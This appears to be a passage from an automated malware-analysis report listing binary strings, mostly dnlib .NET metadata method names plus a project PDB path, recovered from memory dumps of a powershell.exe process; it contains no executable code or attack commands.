                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
